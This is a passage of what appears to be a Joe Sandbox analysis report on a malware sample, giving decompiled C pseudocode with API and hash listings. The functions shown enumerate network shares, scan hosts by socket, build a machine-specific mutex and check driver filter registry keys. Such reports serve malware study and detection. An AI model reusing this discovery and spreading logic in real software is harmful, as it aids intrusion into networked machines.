                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                              					E04E26B95( &_v528, 1, _t21);
                                                                                                                                                              				}
                                                                                                                                                              				_t13 = CreateThread(0, 0, E04E28B2E, _t21, 0, 0); // executed
                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                              					FindCloseChangeNotification(_t13); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_t24 = 0;
                                                                                                                                                              				L5:
                                                                                                                                                              				E04E2733C(_t21); // executed
                                                                                                                                                              				E04E2742C(_t21); // executed
                                                                                                                                                              				if(_t24 == 0) {
                                                                                                                                                              					E04E2751B(_t21, 0x80000000, 0); // executed
                                                                                                                                                              					_t24 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				Sleep(0x2bf20); // executed
                                                                                                                                                              				goto L5;
                                                                                                                                                              			}









                                                                                                                                                              0x04e277dd
                                                                                                                                                              0x04e277ec
                                                                                                                                                              0x04e277f7
                                                                                                                                                              0x04e27802
                                                                                                                                                              0x04e2780b
                                                                                                                                                              0x04e27814
                                                                                                                                                              0x04e2781b
                                                                                                                                                              0x04e27823
                                                                                                                                                              0x04e2782c
                                                                                                                                                              0x04e2782c
                                                                                                                                                              0x04e2783d
                                                                                                                                                              0x04e27845
                                                                                                                                                              0x04e27848
                                                                                                                                                              0x04e27848
                                                                                                                                                              0x04e2784e
                                                                                                                                                              0x04e27850
                                                                                                                                                              0x04e27851
                                                                                                                                                              0x04e27857
                                                                                                                                                              0x04e2785e
                                                                                                                                                              0x04e27867
                                                                                                                                                              0x04e2786e
                                                                                                                                                              0x04e2786e
                                                                                                                                                              0x04e27874
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 04E2781B
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 04E2783D
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04E27848
                                                                                                                                                              • Sleep.KERNELBASE(0002BF20,?,?), ref: 04E27874
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                                                                                                                                              • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                                                                                                              • API String ID: 3743365020-4042105963
                                                                                                                                                              • Opcode ID: ddcba65b2cc73c58e27e700ae112b03c132cab3be369374b7e671bd93d8cdfda
                                                                                                                                                              • Instruction ID: 323ee24601394b5aa75cbbab9c2ffffbbcd6b83e31b00e23221cfbc2b89e0115
                                                                                                                                                              • Opcode Fuzzy Hash: ddcba65b2cc73c58e27e700ae112b03c132cab3be369374b7e671bd93d8cdfda
                                                                                                                                                              • Instruction Fuzzy Hash: 620192F25012387BF72577B65F8CE7BBA7CDB41B49B102268BA01A2004CA64BC40C9B1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E04E28AB3(void* __ecx, void* _a4) {
                                                                                                                                                              				void _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				void _t21;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t30 = _a4;
                                                                                                                                                              				_t21 =  *_t30;
                                                                                                                                                              				_t10 =  *((intOrPtr*)(_t30 + 4));
                                                                                                                                                              				_v8 = _t21;
                                                                                                                                                              				_v12 = _t10;
                                                                                                                                                              				if(_t21 >= _t10) {
                                                                                                                                                              					L6:
                                                                                                                                                              					LocalFree(_t30);
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t28 = __imp__#14;
                                                                                                                                                              				do {
                                                                                                                                                              					_t14 = E04E2A567( *_t28(_t21)); // executed
                                                                                                                                                              					if(_t14 != 0) {
                                                                                                                                                              						__imp__#12( *_t28(_t21));
                                                                                                                                                              						_t24 = E04E2641A(_t15);
                                                                                                                                                              						if(_t24 != 0) {
                                                                                                                                                              							E04E26B95(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
                                                                                                                                                              							HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                              							_t30 = _a4;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t21 = _v8 + 1;
                                                                                                                                                              					_v8 = _t21;
                                                                                                                                                              				} while (_t21 < _v12);
                                                                                                                                                              				goto L6;
                                                                                                                                                              			}












                                                                                                                                                              0x04e28aba
                                                                                                                                                              0x04e28abd
                                                                                                                                                              0x04e28abf
                                                                                                                                                              0x04e28ac3
                                                                                                                                                              0x04e28ac6
                                                                                                                                                              0x04e28acb
                                                                                                                                                              0x04e28b1e
                                                                                                                                                              0x04e28b1f
                                                                                                                                                              0x04e28b2b
                                                                                                                                                              0x04e28b2b
                                                                                                                                                              0x04e28acd
                                                                                                                                                              0x04e28ad3
                                                                                                                                                              0x04e28ad7
                                                                                                                                                              0x04e28ade
                                                                                                                                                              0x04e28ae4
                                                                                                                                                              0x04e28af0
                                                                                                                                                              0x04e28af4
                                                                                                                                                              0x04e28afb
                                                                                                                                                              0x04e28b09
                                                                                                                                                              0x04e28b0f
                                                                                                                                                              0x04e28b0f
                                                                                                                                                              0x04e28af4
                                                                                                                                                              0x04e28b15
                                                                                                                                                              0x04e28b16
                                                                                                                                                              0x04e28b19
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • htonl.WS2_32(74656490), ref: 04E28AD4
                                                                                                                                                              • htonl.WS2_32(74656490), ref: 04E28AE1
                                                                                                                                                              • inet_ntoa.WS2_32(00000000), ref: 04E28AE4
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,00000000,00000000,77974AB0,?,04E28E53,00000000), ref: 04E26439
                                                                                                                                                                • Part of subcall function 04E2641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04E28E53,00000000), ref: 04E26446
                                                                                                                                                                • Part of subcall function 04E2641A: HeapAlloc.KERNEL32(00000000,?,04E28E53,00000000), ref: 04E2644D
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,?,04E28E53,00000000), ref: 04E26465
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04E28B02
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E28B09
                                                                                                                                                              • LocalFree.KERNEL32(?,00002000,76B62D10,74656490), ref: 04E28B1F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 3470587009-3175316637
                                                                                                                                                              • Opcode ID: 2be24317cbd0650451b9a15b69ee8621313bf7ba8c30833c3b987c912d8d954d
                                                                                                                                                              • Instruction ID: a41fc58d21dd405eecce7e527aefc21feee61b5862f4b69463877d93076b166c
                                                                                                                                                              • Opcode Fuzzy Hash: 2be24317cbd0650451b9a15b69ee8621313bf7ba8c30833c3b987c912d8d954d
                                                                                                                                                              • Instruction Fuzzy Hash: 8A0171B6900324BBDB11AFB6DE88C4FB7ACFF483157145929E601E3101D679FD008A60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E21531() {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t4;
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				void* _t7;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              
                                                                                                                                                              				_t3 = 0;
                                                                                                                                                              				do {
                                                                                                                                                              					_t1 = _t3 + L"cscc"; // 0x730063
                                                                                                                                                              					_t11 =  *_t1 & 0x0000ffff;
                                                                                                                                                              					 *(_t3 + L"cscc") = _t11;
                                                                                                                                                              					_t3 = _t3 + 2;
                                                                                                                                                              				} while (_t11 != 0);
                                                                                                                                                              				_t4 = E04E21368(_t11); // executed
                                                                                                                                                              				_t13 = _t4;
                                                                                                                                                              				if(_t13 == 0 || E04E213E8() != 0) {
                                                                                                                                                              					_t5 = E04E211EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", L"LowerFilters"); // executed
                                                                                                                                                              					_t13 = _t5;
                                                                                                                                                              					if(_t13 == 0) {
                                                                                                                                                              						_t7 = E04E211EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", L"UpperFilters"); // executed
                                                                                                                                                              						_t13 = _t7;
                                                                                                                                                              						if(_t13 == 0 && GetVersion() >= 6) {
                                                                                                                                                              							_t9 = E04E211EF(L"SYSTEM\\CurrentControlSet\\Control\\CrashControl", L"DumpFilters"); // executed
                                                                                                                                                              							_t13 = _t9;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}










                                                                                                                                                              0x04e21531
                                                                                                                                                              0x04e21533
                                                                                                                                                              0x04e21533
                                                                                                                                                              0x04e21533
                                                                                                                                                              0x04e2153a
                                                                                                                                                              0x04e21541
                                                                                                                                                              0x04e21544
                                                                                                                                                              0x04e2154a
                                                                                                                                                              0x04e2154f
                                                                                                                                                              0x04e21553
                                                                                                                                                              0x04e21568
                                                                                                                                                              0x04e2156d
                                                                                                                                                              0x04e21571
                                                                                                                                                              0x04e2157d
                                                                                                                                                              0x04e21582
                                                                                                                                                              0x04e21586
                                                                                                                                                              0x04e2159c
                                                                                                                                                              0x04e215a1
                                                                                                                                                              0x04e215a1
                                                                                                                                                              0x04e21586
                                                                                                                                                              0x04e21571
                                                                                                                                                              0x04e215a6

                                                                                                                                                              APIs
                                                                                                                                                              • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,04E211D0,?,?,?), ref: 04E21588
                                                                                                                                                              Strings
                                                                                                                                                              • DumpFilters, xrefs: 04E21592
                                                                                                                                                              • UpperFilters, xrefs: 04E21573
                                                                                                                                                              • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04E21578
                                                                                                                                                              • LowerFilters, xrefs: 04E2155E
                                                                                                                                                              • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04E21597
                                                                                                                                                              • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04E21563
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Version
                                                                                                                                                              • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters
                                                                                                                                                              • API String ID: 1889659487-1640456972
                                                                                                                                                              • Opcode ID: d295ef35e1c2e5eca853fb1a7bd6e0b6651152d34910bda1b69749594b9d784a
                                                                                                                                                              • Instruction ID: f0c494303af3ef442006d0371491e7c8e0765bb241156f31a3d5f7dcc4527cc6
                                                                                                                                                              • Opcode Fuzzy Hash: d295ef35e1c2e5eca853fb1a7bd6e0b6651152d34910bda1b69749594b9d784a
                                                                                                                                                              • Instruction Fuzzy Hash: 86F05422EC573317DBF777A89A0952A81814F10A5E70632D0EC41B710AEA50FF00C691
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 04E2A4A5
                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 04E2A4C3
                                                                                                                                                              • htons.WS2_32(?), ref: 04E2A4E3
                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04E2A4F7
                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 04E2A509
                                                                                                                                                              • select.WS2_32(00000001,00000000,?,00000000,?), ref: 04E2A536
                                                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 04E2A549
                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 04E2A557
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1369790671-0
                                                                                                                                                              • Opcode ID: cff8f0c14747d4fa956382ded2eac57f6821f7037f85cd98628480222ab71a54
                                                                                                                                                              • Instruction ID: d7cd5f06afdae0c9c9a69bbc29bb86f0f21b8eb990bdf5b9214fe0e8696e3dfb
                                                                                                                                                              • Opcode Fuzzy Hash: cff8f0c14747d4fa956382ded2eac57f6821f7037f85cd98628480222ab71a54
                                                                                                                                                              • Instruction Fuzzy Hash: 2A316DB1C00219BFDB20DFA9CD88EEFBBBCEF48315F00456AE615E2150D7789A458B64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E04E27F04() {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void _v38;
                                                                                                                                                              				short _v40;
                                                                                                                                                              				void _v74;
                                                                                                                                                              				short _v76;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t33;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              
                                                                                                                                                              				_t35 = 7;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				memset( &_v38, 0, _t35 << 2);
                                                                                                                                                              				asm("stosw");
                                                                                                                                                              				_push(8);
                                                                                                                                                              				_v76 = 0;
                                                                                                                                                              				memset( &_v74, 0, 0 << 2);
                                                                                                                                                              				_t33 = 0;
                                                                                                                                                              				_v8 = 0x10;
                                                                                                                                                              				if(GetComputerNameW( &_v40,  &_v8) == 0) {
                                                                                                                                                              					L8:
                                                                                                                                                              					return _t33;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t46 = 0;
                                                                                                                                                              					_t23 = E04E27D8D(0,  &_v40, _v8);
                                                                                                                                                              					_t39 =  *0x4e33984; // 0x11c5380
                                                                                                                                                              					_t44 = _t23;
                                                                                                                                                              					if(_t39 != 0) {
                                                                                                                                                              						_t30 =  *0x4e37b94;
                                                                                                                                                              						if( *0x4e37b94 != 0) {
                                                                                                                                                              							_t46 = E04E27D8D(_t39, _t39, _t30 >> 1);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					wsprintfW( &_v76, L"%08X%08X", _t44, _t46);
                                                                                                                                                              					_t27 = CreateMutexW(_t33, _t33,  &_v76); // executed
                                                                                                                                                              					if(_t27 == 0) {
                                                                                                                                                              						GetLastError();
                                                                                                                                                              					} else {
                                                                                                                                                              						if(GetLastError() == 0xb7) {
                                                                                                                                                              							_t33 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L8;
                                                                                                                                                              				}
                                                                                                                                                              			}















                                                                                                                                                              0x04e27f10
                                                                                                                                                              0x04e27f11
                                                                                                                                                              0x04e27f18
                                                                                                                                                              0x04e27f1a
                                                                                                                                                              0x04e27f1e
                                                                                                                                                              0x04e27f21
                                                                                                                                                              0x04e27f28
                                                                                                                                                              0x04e27f32
                                                                                                                                                              0x04e27f34
                                                                                                                                                              0x04e27f43
                                                                                                                                                              0x04e27fb2
                                                                                                                                                              0x04e27fb6
                                                                                                                                                              0x04e27f45
                                                                                                                                                              0x04e27f4d
                                                                                                                                                              0x04e27f4f
                                                                                                                                                              0x04e27f54
                                                                                                                                                              0x04e27f5a
                                                                                                                                                              0x04e27f5e
                                                                                                                                                              0x04e27f60
                                                                                                                                                              0x04e27f67
                                                                                                                                                              0x04e27f72
                                                                                                                                                              0x04e27f72
                                                                                                                                                              0x04e27f67
                                                                                                                                                              0x04e27f7f
                                                                                                                                                              0x04e27f8e
                                                                                                                                                              0x04e27f97
                                                                                                                                                              0x04e27fab
                                                                                                                                                              0x04e27f99
                                                                                                                                                              0x04e27fa4
                                                                                                                                                              0x04e27fa8
                                                                                                                                                              0x04e27fa8
                                                                                                                                                              0x04e27fa4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27f97

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                                                                                                              • String ID: %08X%08X
                                                                                                                                                              • API String ID: 4289762557-1563805794
                                                                                                                                                              • Opcode ID: 0c1a6e9c5a646fe952d63b9c222c7b89443b0bd60461078bfc04f8527800ed22
                                                                                                                                                              • Instruction ID: 15f9158d791d6822874c4155b8ac32982b428c32ef86c6b70fba871b80c6e24e
                                                                                                                                                              • Opcode Fuzzy Hash: 0c1a6e9c5a646fe952d63b9c222c7b89443b0bd60461078bfc04f8527800ed22
                                                                                                                                                              • Instruction Fuzzy Hash: 6A118B72A04118ABEB10DBE5DE88DEEBBBDEF48309F101565E601E2140DB35AE06C761
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E275D8(intOrPtr _a4, int _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t36;
                                                                                                                                                              				int _t42;
                                                                                                                                                              				short* _t47;
                                                                                                                                                              				signed int _t55;
                                                                                                                                                              				signed int _t56;
                                                                                                                                                              				signed int _t58;
                                                                                                                                                              				intOrPtr* _t61;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				signed int _t66;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              
                                                                                                                                                              				_v12 = _v12 | 0xffffffff;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v8 = 0x4000;
                                                                                                                                                              				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
                                                                                                                                                              				if(_t36 == 0) {
                                                                                                                                                              					_t63 = GlobalAlloc(0x40, _v8);
                                                                                                                                                              					_v24 = _t63;
                                                                                                                                                              					if(_t63 != 0) {
                                                                                                                                                              						_v16 = 1;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							memset(_t63, 0, _v8);
                                                                                                                                                              							_t67 = _t67 + 0xc;
                                                                                                                                                              							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8); // executed
                                                                                                                                                              							if(_t42 != 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_a8 = 0;
                                                                                                                                                              							if(_v12 > 0) {
                                                                                                                                                              								_t16 = _t63 + 0x14; // 0x14
                                                                                                                                                              								_t61 = _t16;
                                                                                                                                                              								do {
                                                                                                                                                              									_t55 = 2;
                                                                                                                                                              									if(( *(_t61 - 8) & _t55) != _t55) {
                                                                                                                                                              										_t47 =  *_t61;
                                                                                                                                                              										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
                                                                                                                                                              											_t56 =  *(_t47 + 4) & 0x0000ffff;
                                                                                                                                                              											if(_t56 != 0) {
                                                                                                                                                              												_t66 = _t56;
                                                                                                                                                              												while(_t66 != 0x5c) {
                                                                                                                                                              													_t55 = _t55 + 1;
                                                                                                                                                              													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
                                                                                                                                                              													_t66 = _t58;
                                                                                                                                                              													if(_t58 != 0) {
                                                                                                                                                              														continue;
                                                                                                                                                              													}
                                                                                                                                                              													goto L15;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L15:
                                                                                                                                                              											 *(_t47 + _t55 * 2) = 0;
                                                                                                                                                              											E04E26B95( *_t61 + 4, 0, _a4);
                                                                                                                                                              											_t63 = _v24;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t18 = _t61 - 0x14; // 0x0
                                                                                                                                                              										E04E275D8(_a4, _t18);
                                                                                                                                                              									}
                                                                                                                                                              									_a8 = _a8 + 1;
                                                                                                                                                              									_t61 = _t61 + 0x20;
                                                                                                                                                              								} while (_a8 < _v12);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						if(_t42 != 0x103) {
                                                                                                                                                              							_v16 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						GlobalFree(_t63);
                                                                                                                                                              						WNetCloseEnum(_v20);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}



















                                                                                                                                                              0x04e275de
                                                                                                                                                              0x04e275f3
                                                                                                                                                              0x04e275f6
                                                                                                                                                              0x04e275fd
                                                                                                                                                              0x04e27605
                                                                                                                                                              0x04e27617
                                                                                                                                                              0x04e27619
                                                                                                                                                              0x04e2761e
                                                                                                                                                              0x04e27624
                                                                                                                                                              0x04e27627
                                                                                                                                                              0x04e2762c
                                                                                                                                                              0x04e27631
                                                                                                                                                              0x04e27640
                                                                                                                                                              0x04e27648
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2764e
                                                                                                                                                              0x04e27654
                                                                                                                                                              0x04e27656
                                                                                                                                                              0x04e27656
                                                                                                                                                              0x04e27659
                                                                                                                                                              0x04e2765e
                                                                                                                                                              0x04e27663
                                                                                                                                                              0x04e27673
                                                                                                                                                              0x04e27677
                                                                                                                                                              0x04e27686
                                                                                                                                                              0x04e2768d
                                                                                                                                                              0x04e2768f
                                                                                                                                                              0x04e27691
                                                                                                                                                              0x04e27697
                                                                                                                                                              0x04e27698
                                                                                                                                                              0x04e2769c
                                                                                                                                                              0x04e276a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e276a1
                                                                                                                                                              0x04e27691
                                                                                                                                                              0x04e276a3
                                                                                                                                                              0x04e276a8
                                                                                                                                                              0x04e276b3
                                                                                                                                                              0x04e276b8
                                                                                                                                                              0x04e276b8
                                                                                                                                                              0x04e27665
                                                                                                                                                              0x04e27665
                                                                                                                                                              0x04e2766c
                                                                                                                                                              0x04e2766c
                                                                                                                                                              0x04e276bb
                                                                                                                                                              0x04e276c1
                                                                                                                                                              0x04e276c4
                                                                                                                                                              0x04e276c9
                                                                                                                                                              0x04e27654
                                                                                                                                                              0x04e276d3
                                                                                                                                                              0x04e276d5
                                                                                                                                                              0x04e276d5
                                                                                                                                                              0x04e276d9
                                                                                                                                                              0x04e276e2
                                                                                                                                                              0x04e276e2
                                                                                                                                                              0x04e276e8
                                                                                                                                                              0x04e276ef

                                                                                                                                                              APIs
                                                                                                                                                              • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 04E275FD
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04E27611
                                                                                                                                                              • memset.MSVCRT ref: 04E2762C
                                                                                                                                                              • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04E27640
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 04E276D9
                                                                                                                                                              • WNetCloseEnum.MPR(0000FFFF), ref: 04E276E2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4070278229-0
                                                                                                                                                              • Opcode ID: 63175ef792fac3f5ce0b4f4de32a911ff8d51730ec37c8302e3cbe75a2e3237b
                                                                                                                                                              • Instruction ID: 70e1971b4dd68d4791552c638bcb221cd060dfb7e610fb323773ffce99413ddd
                                                                                                                                                              • Opcode Fuzzy Hash: 63175ef792fac3f5ce0b4f4de32a911ff8d51730ec37c8302e3cbe75a2e3237b
                                                                                                                                                              • Instruction Fuzzy Hash: 6231C172C00129EFDB20AF99CE84DAEBBB9FF44308B109469E645E7150D735AF40CBA1
                                                                                                                                                              Uniqueness

